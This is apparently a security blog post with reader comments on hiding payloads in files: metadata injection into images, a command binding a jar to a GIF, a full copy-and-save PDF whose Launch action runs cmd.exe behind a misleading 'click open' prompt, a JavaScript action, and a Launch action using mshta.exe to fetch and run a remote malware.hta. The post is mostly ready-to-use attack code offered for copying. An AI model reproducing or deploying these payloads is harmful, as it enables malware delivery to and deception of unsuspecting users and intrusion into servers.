New Attack Vectors

Lately there is a real explosion of new attack vectors, in fact today is really simple to include an evil payload into a picture, an office doc or a pdf. This type of weakness afflict a very large range of targets and can be used to exploit local applications or web server with a minimal or null user interaction.

Also the detection of such threats is not so simple due to the nature of the vulnerability. Now I will show few of these methods applied to real applications and services.

Hide webcode inside a picture (image injection)

Nowadays almost every image supports tags according to his format (gif, png) or the “Exchangeable image file format” (jpeg,tiff)  such tags are used to define the picture information like creation date and hour, title, description  and extended information associated with a single image. These metadata are employed to improve the localization, the research or the semantic interoperability of digital data.

I told you all these things because the metadata can be an interesting attack vector, in fact in a web scenario is possible to bypass the image verification adding our payload as metadata. Such thing can be done using any program like photoshop, gimp or special tool like jhead.  The vulnerability afflict only the webpages that using just the GetImageSize php function, I made a videotut in the last years you can find it here.

Picture with crafted payload

Another interesting employ of the image injection is the ability to bind a jar file into a gif,jpg or png picture, this trick can bypass the 99% of the server side checks because the image are usually parsed, in the image reading software, by the header of the file, instead the jar file is parsed by the footer like every zipped file.

Gif header

Gif footer

We can join a gif with a jar file on windows using this command:

copy /b image.gif+evil.jar craftedimage.gif

(the trick can be also used to hide webcode inside picture)

The result will be a normal gif file that you can view without problems and,  at the same time, a fully functional jar file. This can led the opportunity to execute evil code on the server or user machines.


PDF as Attack Vector

As far as i know pdf files are the last frontiers of attack vectors, in fact today it’s possible to embed maliciuos payload to a pdf document.  Before starting is necessary to take a look at the format specification.

The picture show you the pdf structure and the work flow.

The Portable Document Format (PDF) support  few action commands, I put most of them below.

  • Goto (To navigate through the documents in the same page)
  • Submit ( To send data via HTTP)
  • Launch (To launch system applicantions)
  • URI (To navigate to an URI via system browser)
  • Sound ( To play sound)
  • Movie (To play movie)
  • Hide (To hide document’s annotations)
  • JavaScript ( To run javascript)

With these action commands it’s possible to manipulate a pdf to embed a payload and  deceive an user to run it.

Launch system application

The following code will launch local application with all the risks originated by it, I posted a little exemple below so you can copy the highlighted text and save it as pdf.  The juicy part of the code is the object 8.  I will use always this skeleton for future examples.

%PDF-1.1

1 0 obj

<<

/Type /Catalog

/Outlines 2 0 R

/Pages 3 0 R

/OpenAction 8 0 R

>>

endobj

2 0 obj

<<

/Type /Outlines

/Count 0

>>

endobj

3 0 obj

<<

/Type /Pages

/Kids [4 0 R]

/Count 1

>>

endobj

4 0 obj

<<

/Type /Page

/Parent 3 0 R

/MediaBox [0 0 612 792]

/Contents 5 0 R

/Resources

<< /ProcSet 6 0 R

/Font << /F1 7 0 R >>

>>

>>

endobj

5 0 obj

<< /Length 46 >>

stream

BT

/F1 24 Tf

100 700 Td

(Launch cmd and create a file)Tj

ET

endstream

endobj

6 0 obj

[/PDF /Text]

endobj

7 0 obj

<<

/Type /Font

/Subtype /Type1

/Name /F1

/BaseFont /Helvetica

/Encoding /MacRomanEncoding

>>

endobj

8 0 obj

<<

/Type /Action

/S /Launch

/Win

<<

/F (cmd.exe)

/P (/c c:\windows\system32\cmd.exe


Click the “open” button to read the document)

>>

>>

endobj

xref

0 9

0000000000 65535 f

0000000012 00000 n

0000000109 00000 n

0000000165 00000 n

0000000234 00000 n

0000000401 00000 n

0000000505 00000 n

0000000662 00000 n

trailer

<<

/Size 9

/Root 1 0 R

>>

startxref

751

%%EOF

As you can see i tricked with the warning message that pop up when you run the pdf so it’s simple to hide our code to the user.

Put javascript inside a pdf

Using the javascript action we can add javascript code to the pdf.

8 0 obj

<<

/Type /Action

/S /JavaScript

/JS (app.alert({cMsg: ‘This is a javascript’, nIcon: 3});)

>>

endobj

Malware download via pdf

The function launch can be also used to download and run malware from the web.

8 0 obj

<<

/Type /Action

/S /Launch

/Win

<<

/F (c:\\windows\\system32\\mshta.exe)

/P ( http://remote.server.com/malware.hta

Click the “open” button to read the document)

>>

>>

endobj

Using mshta.exe it’s feasible to execute a remote vb script masked as hta file.  All this stuff can be done using metasploit framework, there are some interesting module to embed and convert exe into vbscript.

Last but not least don’t  forget that a payload can be also added to msoffice doc or xls via macros.  Fortunately msoffice  macros are disabled by default so be careful when you run it.


References and Greetz:

http://www.zdnet.com/blog/security/black-hat-sneak-preview/1619

http://blog.didierstevens.com/

http://seclabs.org/fred/docs/sstic09/

http://blog.zemana.com/2010/04/escape-from-pdf-modified-by-zemana.html


Advertisements

2 comments

  1. Hi, I am interested in learning more about how one could actually create an attack vector using the method you describe involving embedding a “jar file” or “webcode” inside an image file. Can you elaborate, or at least point me at some other resource? I am currently doing a pentest at a news media company that allows images to be uploaded.

    thanks

    – Roy

  2. Hi, the payload itself is very simple to build but you need to collect more infos about the target in order to find a flaw to bypass the image validation & verification. I can’t help you without a proper analysis of the target.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s